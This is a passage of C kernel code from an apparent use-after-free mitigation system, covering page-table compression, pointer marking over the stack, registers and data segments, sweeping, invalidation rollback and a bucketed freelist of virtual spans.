294 | 295 | /* TODO: give back fully freed cpt pages to physmem allocator. 296 | * how do we do this? We'd need per-page or per slab metadata... and 297 | * a doubly-linked list to remove arbitrary entries. */ 298 | } 299 | 300 | void cpt_destruct(void) 301 | { 302 | // free the pages in the compression freelist 303 | cpt_t* curr; 304 | while(cpt_freelist != NULL){ 305 | curr = cpt_freelist; 306 | cpt_freelist = *((cpt_t **)cpt_freelist); 307 | 308 | if( ((uintptr_t)curr & 0xfff) == 0){ // page-aligned 309 | free_pages((unsigned long)curr, 0); 310 | } 311 | } 312 | } 313 | 314 | void cpt_nuke(void) 315 | { 316 | cpt_freelist = NULL; 317 | } 318 | 319 | void uncompress_cpt_to_pt(cpt_t *cpt, pte_t *pt) 320 | { 321 | size_t i; 322 | 323 | for (i = 0; i < PT_NUM_ENTRIES; i++) { 324 | pt[i] = PTE_EMPTY; 325 | if (cpt_get_entry(cpt, i, CPT_OBJEND)) 326 | pt[i] |= PTE_OBJEND; 327 | if (cpt_get_entry(cpt, i, CPT_INVALIDATED)) 328 | pt[i] |= PTE_INVALIDATED; 329 | } 330 | } 331 | 332 | pte_t* uncompress_pte(enum pt_level level, pte_t *pte) 333 | { 334 | paddr_t ptpa; 335 | pte_t *pt; 336 | size_t i; 337 | 338 | (void)level; 339 | ASSERT0(level == PT_L2); 340 | ASSERT0(pte_is_compressed(*pte, level)); 341 | 342 | pt = (pte_t*)__get_free_pages(GFP_NOWAIT, 0); // ptpa = pp_zalloc_one(); 343 | memset((void*)pt, 0, PAGE_SIZE); 344 | if (!pt) { 345 | printf("failed to allocate pagetable page!\n"); 346 | return NULL; 347 | } 348 | 349 | #ifdef __TRACK_MEM_USAGE 350 | curr_pt_count++; 351 | if(curr_pt_count > max_pt_count){ 352 | max_pt_count = curr_pt_count; 353 | } 354 | #endif 355 | 356 | ptpa = virt_to_phys(pt); // pt = pt_paddr2vaddr(ptpa); 357 | 358 | if ((*pte & PTE_CMS_ONEBIG) || (*pte & PTE_CMS_ALLSMALL)) { 359 | //LOG("Uncompressing compact PTE %lx\n", *pte); 360 | pte_t pte_bits = PTE_INVALIDATED; 361 | if (*pte & PTE_CMS_ALLSMALL) 362 | pte_bits |= PTE_OBJEND; 363 | 364 | for (i = 0; i < PT_NUM_ENTRIES; i++) 365 | pt[i] = pte_bits; 366 | } else { 367 | cpt_t *cpt = (cpt_t *)((*pte & PTE_FRAME_CPT) + PAGE_OFFSET); 368 | //LOG(" uncompressing cpt %p to pt %p\n", cpt, pt); 369 | uncompress_cpt_to_pt(cpt, pt); 370 | cpt_free(cpt); 371 | } 372 | 373 | *pte = (pte_t)ptpa | PTE_ALIASSES | PTE_NX | PTE_W | PTE_P; 374 | return pt; 375 | } 376 | 377 | void compress_pt_to_cpt(pte_t *pt, cpt_t *cpt) 378 | { 379 | size_t i; 380 | 381 | for (i = 0; i < PT_NUM_ENTRIES; i++) { 382 | bool objend = !!(pt[i] & PTE_OBJEND); 383 | bool invalidated = !!(pt[i] & PTE_INVALIDATED); 384 | 385 | ASSERT0(!(pt[i] & PTE_P)); 386 | 387 | cpt_set_entry(cpt, i, CPT_OBJEND, objend); 388 | cpt_set_entry(cpt, i, CPT_INVALIDATED, invalidated); 389 | } 390 | } 391 | 392 | static enum compression_type pt_is_compressable(pte_t *pt) 393 | { 394 | unsigned pte_idx; 395 | unsigned num_objends = 0; 396 | 397 | for (pte_idx = 0; pte_idx < PT_NUM_ENTRIES; pte_idx++) { 398 | if (!(pt[pte_idx] & PTE_INVALIDATED)) 399 | return COMPRESSION_NONE; 400 | if (pt[pte_idx] & PTE_OBJEND) 401 | num_objends++; 402 | } 403 | 404 | if (num_objends == 0) 405 | return COMPRESSION_ONEBIG; 406 | else if (num_objends == PT_NUM_ENTRIES) 407 | return COMPRESSION_ALLSMALL; 408 | else 409 | return COMPRESSION_NORMAL; 410 | } 411 | 412 | 413 | static void try_compress_pt_rec(vaddr_t va, 414 | vaddr_t va_end, 415 | enum pt_level level, 416 | pte_t *pt) 417 | { 418 | const size_t level_inc = 1UL << pt_level_shift(level); 419 | vaddr_t va_level_next, va_level_end; 420 | pte_t *ppte, *nextpt; 421 | size_t ptoff; 422 | paddr_t nextpt_pa; 423 | 424 | ASSERT0(level > PT_L1); 425 | 426 | while (va < va_end) { 427 | ptoff = pt_level_offset(va, level); 428 | va_level_next = (va + level_inc) & ~(level_inc - 1); 429 | va_level_end = va_end < va_level_next ? va_end : va_level_next; 430 | 431 | ppte = &pt[ptoff]; 432 | //LOG("pt%d va=%#lx pt=%p off=%zx pte=%lx\n", level, va, pt, ptoff, *ppte); 433 | if (!FLAG_ISSET(*ppte, PTE_P) || FLAG_ISSET(*ppte, PTE_PS)) 434 | return; 435 | 436 | nextpt_pa = *ppte & PTE_FRAME; 437 | nextpt = (pte_t*)pt_paddr2vaddr(nextpt_pa); 438 | 439 | if (level > PT_L2) 440 | try_compress_pt_rec(va, va_level_end, level - 1, nextpt); 441 | else if (level == PT_L2) { 442 | enum compression_type type = pt_is_compressable(nextpt); 443 | if (type == COMPRESSION_NORMAL) { 444 | cpt_t *cpt = cpt_alloc(); 445 | compress_pt_to_cpt(nextpt, cpt); 446 | 447 | //LOG(" ########## pt%d empty for va=%lx, compressing %lx to %p in pte %p\n", 448 | // level - 1, va, nextpt_pa, cpt, ppte); 449 | 450 | *ppte = (pte_t)virt_to_phys(cpt) | PTE_COMPRESSED; 451 | //LOG("New PTE: %lx\n", *ppte); 452 | //pp_free_one(nextpt_pa); 453 | free_pages((unsigned long)nextpt, 0); 454 | #ifdef __TRACK_MEM_USAGE 455 | curr_pt_count--; 456 | #endif 457 | } else if (type == COMPRESSION_ONEBIG || 458 | type == COMPRESSION_ALLSMALL) { 459 | //LOG(" ########## pt%d very empty for va=%lx, compressing %lx to %s in pte %p\n", 460 | // level - 1, va, nextpt_pa, type == COMPRESSION_ONEBIG ? "ONEBIG" : "ALLSMALL", ppte); 461 | *ppte = PTE_COMPRESSED; 462 | if (type == COMPRESSION_ONEBIG) 463 | *ppte |= PTE_CMS_ONEBIG; 464 | else if (type == COMPRESSION_ALLSMALL) 465 | *ppte |= PTE_CMS_ALLSMALL; 466 | 467 | //pp_free_one(nextpt_pa); 468 | free_pages((unsigned long)nextpt, 0); 469 | #ifdef __TRACK_MEM_USAGE 470 | curr_pt_count--; 471 | #endif 472 | } 473 | } 474 | va = va_level_next; 475 | 476 | //LOG("pt%d next va=%p end=%p next_freed=%u freed=%u\n", level, va, va_end, next_freed, freed); 477 | 478 | } 479 | } 480 | 481 | // TODO do we ever need to compress pages with non-invalidated entries? 482 | // i.e., compress fully invalidated ones, throw away fully reusable ones, leave 483 | // mixed ones? we can also have 2 compressed formats 484 | void try_compress_pt(vaddr_t va, size_t npages) 485 | { 486 | vaddr_t va_end = PG_OFFSET(va, npages); 487 | pte_t *ptroot = (pte_t*)g_cr3; 488 | //LOG("==================================================================\n"); 489 | //LOG("Compressing %lx - %lx (%zx pages)\n", va, va_end, npages); 490 | 491 | 492 | try_compress_pt_rec(va, va_end, PT_L4, ptroot); 493 | } 494 | 495 | ///// marking ///// 496 | static int mark_ptr_rec(uintptr_t ptr, enum pt_level level, pte_t *pt); 497 | int mark_ptr(uintptr_t ptr) 498 | { 499 | int ret; 500 | //LOG("GC mark %#lx\n", ptr); 501 | ret = mark_ptr_rec(ptr, PT_L4, g_cr3); 502 | return ret; 503 | } 504 | 505 | static int mark_compressed_pte(uintptr_t ptr, enum pt_level level, pte_t *pte) 506 | { 507 | pte_t *nextpt; 508 | pte_t *ret; 509 | 510 | ASSERT0(level == PT_L2); 511 | ASSERT0(pte_is_compressed(*pte, level)); 512 | 513 | if (*pte & PTE_CMS_ONEBIG) { 514 | //LOG("Marking ONEBIG %lx\n", ptr); 515 | return 0; /* Leave compressed, mark_ptr_rec sets PTE_MARKED. */ 516 | } 517 | 518 | ret = uncompress_pte(level, pte); 519 | if (ret == NULL) 520 | return -1; 521 | 522 | uintptr_t frame = *pte & PTE_FRAME; 523 | if(frame == 0) return 0; 524 | nextpt = (pte_t *)pt_paddr2vaddr(frame); 525 | mark_ptr_rec(ptr, level - 1, nextpt); 526 | return 0; 527 | } 528 | 529 | static int mark_ptr_rec(uintptr_t ptr, enum pt_level level, pte_t *pt) 530 | { 531 | size_t ptoff; 532 | pte_t *pte, *nextpt; 533 | bool is_compressed = false; 534 | 535 | ptoff = pt_level_offset(ptr, level); 536 | pte = &pt[ptoff]; 537 | 538 | #ifdef __GC_PT_COMPRESS 539 | is_compressed = pte_is_compressed(*pte, level); 540 | #endif 541 | 542 | /* Avoid creating page tables for areas we never allocated/invalidated. */ 543 | if (level > PT_L1 && !(*pte & PTE_ALIASSES) && !is_compressed) 544 | return 0; 545 | 546 | /* Avoid needless setting/unsetting of marked bits. */ 547 | if (level == PT_L1 && !(*pte & PTE_INVALIDATED)) 548 | return 0; 549 | 550 | if (level > PT_L1) { 551 | ASSERT0(!(*pte & PTE_PS) || is_compressed); 552 | ASSERT0(!(*pte & PTE_INVALIDATED) || is_compressed); 553 | #ifdef __GC_PT_COMPRESS 554 | if (is_compressed) { 555 | if (mark_compressed_pte(ptr, level, pte)) 556 | return -1; 557 | } else 558 | #endif 559 | { 560 | // for some reason *pte&frame == 0 is not caught 561 | uintptr_t frame = *pte & PTE_FRAME; 562 | if(frame == 0) return 0; 563 | 564 | nextpt = (pte_t *)pt_paddr2vaddr(frame); 565 | if (mark_ptr_rec(ptr, level - 1, nextpt)) 566 | return -1; 567 | } 568 | } 569 | 570 | *pte |= PTE_MARKED; 571 | return 0; 572 | } 573 | 574 | static void mark_regs(void) 575 | { 576 | size_t i; 577 | struct { 578 | unsigned long rax, rbx, rcx, rdx, rsi, rdi, rbp, 579 | r8, r9, r10, r11, r12, r13, r14, r15; 580 | } regs; 581 | 582 | #if 0 583 | char *regnames[] = {"rax", "rbx", "rcx", "rdx", "rsi", "rdi", "rbp", 584 | "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"}; 585 | #endif 586 | 587 | asm ("mov %%rax, 0(%0) \n\t" 588 | "mov %%rbx, 8(%0) \n\t" 589 | "mov %%rcx, 16(%0) \n\t" 590 | "mov %%rdx, 24(%0) \n\t" 591 | "mov %%rsi, 32(%0) \n\t" 592 | "mov %%rdi, 40(%0) \n\t" 593 | "mov %%rbp, 48(%0) \n\t" 594 | "mov %%r8, 56(%0) \n\t" 595 | "mov %%r9, 64(%0) \n\t" 596 | "mov %%r10, 72(%0) \n\t" 597 | "mov %%r11, 80(%0) \n\t" 598 | "mov %%r12, 88(%0) \n\t" 599 | "mov %%r13, 96(%0) \n\t" 600 | "mov %%r14, 104(%0) \n\t" 601 | "mov %%r15, 112(%0) \n\t" 602 | : 603 | : "r"(®s) 604 | : "memory"); 605 | 606 | #if 0 607 | for (i = 0; i < sizeof(regs) / 8; i++) 608 | LOG(" %s: %016lx\n", regnames[i], ((unsigned long*)®s)[i]); 609 | #endif 610 | 611 | for (i = 0; i < sizeof(regs) / 8; i++) { 612 | uintptr_t v = ((uintptr_t*)®s)[i]; 613 | if (is_potential_ptr(v)) 614 | mark_ptr(v); 615 | } 616 | } 617 | 618 | static void mark_stack(void) 619 | { 620 | uintptr_t *sp, *top; 621 | 622 | sp = (uintptr_t *)get_stack_pointer(); 623 | top = (uintptr_t *)stack_top; 624 | 625 | for (; sp < top; sp++) { 626 | if (is_potential_ptr(*sp)){ 627 | mark_ptr(*sp); 628 | } 629 | } 630 | } 631 | 632 | static void mark_datasegs(void) 633 | { 634 | /* TODO data/bss of libs? */ 635 | 636 | uintptr_t *iter; 637 | 638 | for (iter = (uintptr_t*)bss_start; iter < (uintptr_t*)bss_end; iter++) 639 | if (is_potential_ptr(*iter)) 640 | mark_ptr(*iter); 641 | 642 | for (iter = (uintptr_t*)data_start; iter < (uintptr_t*)data_end; iter++) 643 | if (is_potential_ptr(*iter)) 644 | mark_ptr(*iter); 645 | } 646 | 647 | 648 | ///////// sweeping ///////// 649 | static void rollback_invalidations_compressed(vaddr_t va, 650 | vaddr_t va_end, 651 | vaddr_t obj_end_va, 652 | cpt_t *cpt) 653 | { 654 | size_t i, idx_start, idx_end, idx_obj_end; 655 | 656 | idx_start = pt_level_offset(va, PT_L1); 657 | idx_end = pt_level_offset(va_end, PT_L1); 658 | idx_obj_end = obj_end_va <= va_end ? pt_level_offset(obj_end_va, PT_L1) 659 | : PT_NUM_ENTRIES; 660 | if (idx_end == 0) idx_end = PT_NUM_ENTRIES; 661 | 662 | (void)idx_obj_end; 663 | //LOG("rbci %zu %zu (%zu)\n", idx_start, idx_end, idx_obj_end); 664 | 665 | for (i = idx_start; i < idx_end; i++) { 666 | //LOG("rbc idx=%zu objend=%zu\n", i, idx_obj_end); 667 | cpt_set_entry(cpt, i, CPT_INVALIDATED, 1); 668 | } 669 | } 670 | 671 | static void rollback_invalidations_rec(vaddr_t va, 672 | vaddr_t va_end, 673 | vaddr_t obj_end_va, 674 | enum pt_level level, 675 | pte_t *pt) 676 | { 677 | const size_t level_inc = 1UL << pt_level_shift(level); 678 | vaddr_t va_level_next, va_level_end; 679 | pte_t *pte, *nextpt; 680 | 681 | while (va < va_end) { 682 | va_level_next = (va + level_inc) & ~(level_inc - 1); 683 | va_level_end = va_end < va_level_next ? va_end : va_level_next; 684 | pte = &pt[pt_level_offset(va, level)]; 685 | 686 | //LOG("rb pt%d va=%#lx pte=%p *pte=%lx (nxt=%lx end=%lx)\n", level, va, pte, *pte, va_level_next, va_end); 687 | 688 | if (level > PT_L1 && !(*pte & PTE_P) && !pte_is_compressed(*pte, level)) { 689 | /* We (overoptimistically) cleared away an entire pgtable and need 690 | * to (re)allocate one. We know a cpt is always fine for this, 691 | * optionally we can use a ONEBIG entry. */ 692 | #ifdef __GC_PT_COMPRESS 693 | if (level > PT_L2) { 694 | #else 695 | if (level >= PT_L2) { 696 | #endif 697 | // NOTE: a rollback can never increase max mem usage curr_pt 698 | pte_t* temp_pt = (pte_t*)__get_free_pages(GFP_NOWAIT, 0); // paddr_t ptpa = pp_zalloc_one(); 699 | memset((void*)temp_pt, 0, PAGE_SIZE); 700 | 701 | #ifdef __TRACK_MEM_USAGE 702 | curr_pt_count++; 703 | if(curr_pt_count > max_pt_count){ 704 | max_pt_count = curr_pt_count; 705 | } 706 | #endif 707 | 708 | paddr_t ptpa = virt_to_phys(temp_pt); 709 | ASSERT0(ptpa); 710 | *pte = (pte_t)ptpa | PTE_ALIASSES | PTE_NX | PTE_W | PTE_P; 711 | } else if (level == PT_L2) { 712 | if ((va & (level_inc - 1)) == 0 && va_level_end == va_level_next) { 713 | *pte = PTE_CMS_ONEBIG; 714 | } else { 715 | size_t i; 716 | cpt_t *cpt = cpt_alloc(); 717 | for (i = 0; i < PT_NUM_ENTRIES; i++) { 718 | cpt_set_entry(cpt, i, CPT_OBJEND, 0); 719 | cpt_set_entry(cpt, i, CPT_INVALIDATED, 0); 720 | } 721 | //*pte = (pte_t)cpt | PTE_COMPRESSED; 722 | *pte = (pte_t)virt_to_phys(cpt) | PTE_COMPRESSED; 723 | } 724 | } 725 | } 726 | 727 | if (level == PT_L1) { 728 | ASSERT0(*pte == PTE_EMPTY); 729 | *pte = PTE_INVALIDATED; 730 | if (va == obj_end_va) 731 | *pte = PTE_OBJEND; 732 | 733 | } else if (pte_is_compressed(*pte, level)) { 734 | ASSERT0(level == PT_L2); 735 | cpt_t *cpt = (void*)((*pte & PTE_FRAME_CPT) + PAGE_OFFSET); 736 | rollback_invalidations_compressed(va, va_level_end, obj_end_va, 737 | cpt); 738 | 739 | } else if (!(*pte & PTE_P) && (*pte & PTE_CMS_ONEBIG)) { 740 | ASSERT0(!(*pte & PTE_COMPRESSED)); 741 | ASSERT0(!(*pte & PTE_MARKED)); 742 | *pte |= PTE_COMPRESSED; 743 | 744 | } else { 745 | ASSERT0(*pte & PTE_P); 746 | nextpt = (pte_t*)pt_paddr2vaddr(*pte & PTE_FRAME); 747 | rollback_invalidations_rec(va, va_level_end, obj_end_va, level - 1, 748 | nextpt); 749 | } 750 | 751 | va = va_level_next; 752 | } 753 | } 754 | 755 | /* 756 | * During sweeping we optimistically undo the invalidation of PTEs, which we may 757 | * need to roll back later if one of the objects' pages was marked. 758 | */ 759 | void rollback_invalidations(vaddr_t start, 760 | size_t npages_cleared, 761 | size_t npages_total) 762 | { 763 | vaddr_t va_end = PG_OFFSET(start, npages_cleared); 764 | vaddr_t obj_end_va = PG_OFFSET(start, npages_total); 765 | pte_t *ptroot = (pte_t*)g_cr3; 766 | 767 | //LOG("Reinvalidating %lx-%lx(-%lx)\n", start, va_end, obj_end_va); 768 | //fprintf(stderr, "ROLLBACK: %lx - %lx (end %lx)\n", start, va_end, obj_end_va); 769 | 770 | ASSERT0((start & (PGSIZE - 1)) == 0); 771 | ASSERT0(npages_cleared > 0); 772 | ASSERT0(npages_cleared <= npages_total); 773 | 774 | rollback_invalidations_rec(start, va_end, obj_end_va, PT_L4, ptroot); 775 | } 776 | 777 | static vaddr_t sweep_curobj_start, sweep_curobj_end; 778 | static bool sweep_curobj_marked; 779 | static size_t sweep_curobj_num_cleared; 780 | 781 | static inline void sweep_curobj_reset(void) 782 | { 783 | sweep_curobj_end = 0; 784 | sweep_curobj_marked = 0; 785 | sweep_curobj_num_cleared = 0; 786 | } 787 | 788 | static bool sweep_pt_rec(enum pt_level level, pte_t *pt, 789 | size_t idx_start, size_t idx_end, vaddr_t partial_va); 790 | static void sweep_all(void) 791 | { 792 | pte_t *pt = (pte_t*)g_cr3; 793 | size_t ptoff_start = pt_level_offset(SHADOW_BASE, PT_L4); 794 | size_t ptoff_end = pt_level_offset(highest_shadow, PT_L4); // SHADOW_END 795 | 796 | if(ptoff_end == ptoff_start) 797 | ptoff_end++; 798 | 799 | LOG("sweep from pt: %p L4 ids: %lu %lu\n", pt, ptoff_start, ptoff_end); 800 | sweep_curobj_reset(); 801 | sweep_pt_rec(PT_L4, pt, ptoff_start, ptoff_end, 0); 802 | } 803 | 804 | void cascade_bucket_ptrs(unsigned b, struct vp_span* old, struct vp_span* new) 805 | { 806 | // upon merge-into-next, a bucket ptr can move 807 | // if other bucket ptrs pointed to the same span 808 | // they should move with, because the old-next gets freed 809 | // search left buckets is not needed 810 | // smaller cannot share ptr 811 | 812 | // smaller buckets do not have to be searched, 813 | // since they cannot point to a larger bucket's span 814 | 815 | // the mega span 816 | if(old->end > highest_shadow){ 817 | return; 818 | } 819 | 820 | // other bucket ptrs only relevant if the span is large enough 821 | unsigned end_bucket = ((old->end - SHADOW_BASE) / bucket_size); 822 | 823 | // search right buckets 824 | for(unsigned s = b+1; b <= end_bucket; b++){ 825 | if(sub_spans[s] != NULL){ 826 | if(sub_spans[s] == old){ 827 | sub_spans[s] = new; 828 | } 829 | else{ 830 | // next span is not shared, stop search 831 | break; 832 | } 833 | } 834 | } 835 | } 836 | 837 | struct vp_span* b_try_merge(unsigned b, struct vp_span* left, struct vp_span* right) 838 | { 839 | if (left->end != right->start) 840 | return NULL; 841 | 842 | cascade_bucket_ptrs(b, right, left); 843 | 844 | // test 845 | // left->last_sync = false; 846 | 847 | // merge 'right' into 'left' 848 | left->end = right->end; 849 | // disable (gc) 850 | #ifdef WM_ZERO 851 | right->start = 0; right->end = 0; 852 | #endif 853 | LIST_REMOVE(right, freelist); 854 | WM_FREE(right); 855 | 856 | return left; 857 | } 858 | 859 | static void add_for_reuse(vaddr_t va, size_t npages) 860 | { 861 | // TODO: batch this operation? virtmem_alloc already merges spans 862 | 863 | // bucketing 864 | #if (NUM_BUCKETS == 1) 865 | freelist_free(opt_freelist, (void*)va, npages); 866 | #else 867 | unsigned bucket = ((va - SHADOW_BASE) / bucket_size); 868 | 869 | ASSERT0(bucket < NUM_BUCKETS); 870 | 871 | vaddr_t start = va; 872 | vaddr_t end = PG_OFFSET(start, npages); 873 | 874 | /* 875 | try bucket b: if null -> the area is not covered -> move left 876 | if not null: iterate upwards to find its destination 877 | update the concerned sub spans bucket ptrs 878 | */ 879 | 880 | int b = bucket; 881 | bool found = false; 882 | 883 | // if list is completely empty 884 | struct vp_freelist *list = opt_freelist; 885 | if(LIST_EMPTY(&list->items) || opt_freelist->items.lh_first == NULL){ 886 | //fprintf(stderr, "list is empty. new span (bucket %u)\n", b); 887 | // create new span 888 | struct vp_span *span = WM_ALLOC(sizeof(struct vp_span)); 889 | span->start = start; 890 | span->end = end; 891 | span->last_sync = false; 892 | LIST_INSERT_HEAD(&list->items, span, freelist); 893 | // update bucket ptr 894 | // sub_spans[b] = span; 895 | 896 | // get end_bucket of 'end' 897 | unsigned end_bucket = ((end - SHADOW_BASE) / bucket_size); 898 | for(; b <= end_bucket; b++){ 899 | sub_spans[b] = span; 900 | } 901 | return; 902 | } 903 | 904 | // if dest. bucket is empty 905 | if(sub_spans[b] == NULL){ 906 | //fprintf(stderr, "bucket %u is empty, find prev\n", b); 907 | // find the previous bucket with content s.t. we can insert 908 | if(b > 0){ 909 | for(; b >= 0; b--){ // b = b-1? 910 | if(sub_spans[b] != NULL){ 911 | found = true; 912 | break; 913 | } 914 | } 915 | } 916 | if(!found){ 917 | // no previous -> span becomes the list head 918 | // insert before the current head 919 | struct vp_span *head = list->items.lh_first; 920 | 921 | // can merge? 922 | if(end == head->start){ 923 | //fprintf(stderr, "no prev found, can merge with head\n"); 924 | head->start = start; 925 | head->last_sync = false; 926 | sub_spans[bucket] = head; 927 | } 928 | else{ 929 | //fprintf(stderr, "no prev found, new head\n"); 930 | struct vp_span *span = WM_ALLOC(sizeof(struct vp_span)); 931 | span->start = start; 932 | span->end = end; 933 | span->last_sync = false; 934 | LIST_INSERT_BEFORE(head, span, freelist); 935 | //sub_spans[bucket] = span; 936 | // get end_bucket of 'end' 937 | unsigned end_bucket = ((end - SHADOW_BASE) / bucket_size); 938 | for(; bucket <= end_bucket; bucket++){ 939 | sub_spans[bucket] = span; 940 | } 941 | } 942 | return; 943 | } 944 | 945 | //fprintf(stderr, "prev of empty bucket is bucket %u\n", b); 946 | } 947 | 948 | //fprintf(stderr, "using bucket %u for insertion (og %u)\n", b, bucket); 949 | 950 | // bucket 'b' should concern insertion 951 | // bucket 'bucket' still needs potential pointer update 952 | 953 | // cascading bucket pointer updates: 954 | // not needed for insert-before: they would not contain the other bucket 955 | // not needed for merge with prev: span ptr stays intact 956 | // is needed for merge with next: new span can join on the left side, 957 | // essentially freeing the next 958 | 959 | struct vp_span *prev=NULL, *next; 960 | for(next = sub_spans[b]; next != NULL; next = next->freelist.le_next){ 961 | if(next->start >= end){ 962 | break; 963 | } 964 | prev = next; 965 | } 966 | 967 | // try merge with prev 968 | if(prev != NULL && prev->end == start){ 969 | prev->end = end; 970 | // test 971 | // prev->last_sync = false; 972 | if(next != NULL){ // next is not end 973 | b_try_merge(b, prev, next); 974 | } 975 | //fprintf(stderr, "merging with prev: %lx\n", prev->start); 976 | 977 | if(found){ 978 | sub_spans[bucket] = prev; 979 | // bucket came from NULL, so nothing depends on it 980 | } 981 | return; 982 | } 983 | 984 | // try merge with next 985 | if(next != NULL && next->start == end){ 986 | next->start = start; 987 | next->last_sync = false; 988 | if(prev != NULL){ 989 | if(b_try_merge(b, prev, next) != NULL){ 990 | if(found){ 991 | sub_spans[bucket] = prev; 992 | return; 993 | } 994 | } 995 | } 996 | 997 | if(found){ 998 | sub_spans[bucket] = next; 999 | // bucket came from NULL, so nothing depends on it 1000 | } 1001 | //fprintf(stderr, "merging with next: %lx\n", next->end); 1002 | return; 1003 | } 1004 | 1005 | // could not merge in current bucket range 1006 | struct vp_span *span = WM_ALLOC(sizeof(struct vp_span)); 1007 | if (UNLIKELY(!span)) { 1008 | LOG("could not allocate vp_span: out of memory?\n"); 1009 | return; 1010 | } 1011 | span->start = start; 1012 | span->end = end; 1013 | span->last_sync = false; 1014 | 1015 | if(found){ 1016 | // if the bucket ptr was empty, let it point to new span 1017 | //sub_spans[bucket] = span; 1018 | // get end_bucket of 'end' 1019 | unsigned end_bucket = ((end - SHADOW_BASE) / bucket_size); 1020 | for(; bucket <= end_bucket; bucket++){ 1021 | sub_spans[bucket] = span; 1022 | } 1023 | } 1024 | 1025 | //fprintf(stderr, "could not merge. new span\n"); 1026 | 1027 | if(prev){ 1028 | LIST_INSERT_AFTER(prev, span, freelist); 1029 | } else if(next != NULL){ // next is not end of list (NULL) 1030 | LIST_INSERT_BEFORE(next, span, freelist); 1031 | if(next == sub_spans[bucket]){ 1032 | // we inserted before the bucket ptr. update. 1033 | sub_spans[bucket] = span; 1034 | } 1035 | /*if(next == sub_spans[b]){ 1036 | // ?? is this even possible 1037 | sub_spans[b] = span; 1038 | }*/ 1039 | } 1040 | #endif 1041 | //LOG("we can add VA=%p to free list!\n", (void*)va); 1042 | } 1043 | 1044 | static inline void sweep_curobj_done(void) 1045 | { 1046 | size_t npages; 1047 | // if(sweep_curobj_marked) 1048 | // LOG("Sweep obj %lx-%lx marked=%d\n", sweep_curobj_start, sweep_curobj_end, sweep_curobj_marked); 1049 | if (sweep_curobj_end) { 1050 | npages = (sweep_curobj_end - sweep_curobj_start) / PGSIZE; 1051 | 1052 | if (!sweep_curobj_marked) 1053 | add_for_reuse(sweep_curobj_start, npages); 1054 | else if (sweep_curobj_num_cleared) { 1055 | /* Roll back the un-invalidation of PTEs. */ 1056 | rollback_invalidations(sweep_curobj_start, sweep_curobj_num_cleared, npages); 1057 | } 1058 | } 1059 | sweep_curobj_reset(); 1060 | } 1061 | static inline void sweep_curobj_add(vaddr_t va, size_t npages) 1062 | { 1063 | if (sweep_curobj_end) { 1064 | //fprintf(stderr, "va %lx end %lx start %lx\n", va, sweep_curobj_end, sweep_curobj_start); 1065 | ASSERT0(va == sweep_curobj_end); 1066 | sweep_curobj_end += npages * PGSIZE; 1067 | } else { 1068 | sweep_curobj_start = va; 1069 | sweep_curobj_end = va + npages * PGSIZE; 1070 | } 1071 | } 1072 | 1073 | static bool sweep_pt_compressed_cpt(cpt_t *cpt, vaddr_t partial_va) 1074 | { 1075 | /* We are always at level PT_L1. 1076 | * We know entire thing is unmarked (otherwise mark_ptr would have 1077 | * uncompressed this entry). */ 1078 | 1079 | size_t num_free_entries = 0; 1080 | size_t i; 1081 | 1082 | //fprintf(stderr, "Start Sweeping compressed cpt=%p va=%lx\n", cpt, partial_va); 1083 | //LOG("Start Sweeping compressed cpt=%p va=%lx\n", cpt, partial_va); 1084 | //dump_cpt(cpt, partial_va); 1085 | 1086 | for (i = 0; i < PT_NUM_ENTRIES; i++) { 1087 | bool is_objend = cpt_get_entry(cpt, i, CPT_OBJEND); 1088 | bool is_inval = cpt_get_entry(cpt, i, CPT_INVALIDATED); 1089 | bool is_marked = 0; /* XXX For when we support compressed marking. */ 1090 | vaddr_t va = partial_va | (i * PGSIZE); 1091 | 1092 | //fprintf(stderr, " sweep cpt i=%zu va=%lx curend=%lx isend=%d isinval=%d\n", i, va, sweep_curobj_end, is_objend, is_inval); 1093 | if (!is_inval) { 1094 | num_free_entries++; 1095 | continue; 1096 | } 1097 | 1098 | sweep_curobj_add(va, 1); 1099 | 1100 | if (is_marked) 1101 | sweep_curobj_marked = 1; 1102 | else if (!sweep_curobj_marked) { 1103 | //cpt_set_entry(cpt, i, CPT_OBJEND, 0); 1104 | cpt_set_entry(cpt, i, CPT_INVALIDATED, 0); 1105 | sweep_curobj_num_cleared++; 1106 | num_free_entries++; 1107 | } 1108 | 1109 | if (is_objend) 1110 | sweep_curobj_done(); 1111 | } 1112 | 1113 | //dump_cpt(cpt, partial_va); 1114 | return num_free_entries == PT_NUM_ENTRIES; 1115 | } 1116 | 1117 | static bool sweep_pt_compressed_pte(enum pt_level level, 1118 | pte_t *pte, 1119 | vaddr_t partial_va) 1120 | { 1121 | // XXX start/end idx support? 1122 | ASSERT0(level == PT_L2); 1123 | ASSERT0(pte_is_compressed(*pte, level)); 1124 | 1125 | if (*pte & PTE_CMS_ONEBIG) { 1126 | //LOG("+++++ CMS BIGONE %lx pte=%lx\n", partial_va, *pte); 1127 | sweep_curobj_add(partial_va, PT_NUM_ENTRIES); 1128 | if (*pte & PTE_MARKED) 1129 | sweep_curobj_marked = 1; 1130 | else if (!sweep_curobj_marked) { 1131 | /* Optimistically mark reusable (leave ONEBIG bit for rollback). */ 1132 | *pte &= ~PTE_COMPRESSED; 1133 | sweep_curobj_num_cleared += PT_NUM_ENTRIES; 1134 | return true; 1135 | } 1136 | 1137 | return false; 1138 | 1139 | } else if (*pte & PTE_CMS_ALLSMALL) { 1140 | /* While this cpt has all OBJEND bits set, the first page in this cpt 1141 | * may belong to an object that was started earlier, and it may be 1142 | * marked. If it is marked we have to uncompress, because the rest of 1143 | * the pages/objects in this cpt are invalid and unmarked (and thus will 1144 | * become reusable) resulting in a mixed valid/invalid cpt. */ 1145 | 1146 | //LOG("+++++ CMS ALLSMALL %lx pte=%lx marked=%d\n", partial_va, *pte, sweep_curobj_marked); 1147 | 1148 | if (sweep_curobj_marked) { 1149 | /* TODO: uncompress to a cpt instead of full pt */ 1150 | pte_t *nextpt; 1151 | uncompress_pte(level, pte); 1152 | nextpt = (pte_t*)pt_paddr2vaddr(*pte & PTE_FRAME); 1153 | sweep_pt_rec(level - 1, nextpt, 0, PT_NUM_ENTRIES, partial_va); 1154 | 1155 | return false; 1156 | } else { 1157 | /* Batch all individual (unmarked) objects. There'd never be 1158 | * a situation where we'd have to roll back. */ 1159 | *pte = PTE_EMPTY; 1160 | sweep_curobj_add(partial_va, PT_NUM_ENTRIES); 1161 | sweep_curobj_done(); 1162 | 1163 | return true; 1164 | } 1165 | } else { 1166 | cpt_t *cpt = (cpt_t *)((*pte & PTE_FRAME_CPT) + PAGE_OFFSET); 1167 | //LOG("pte=%p 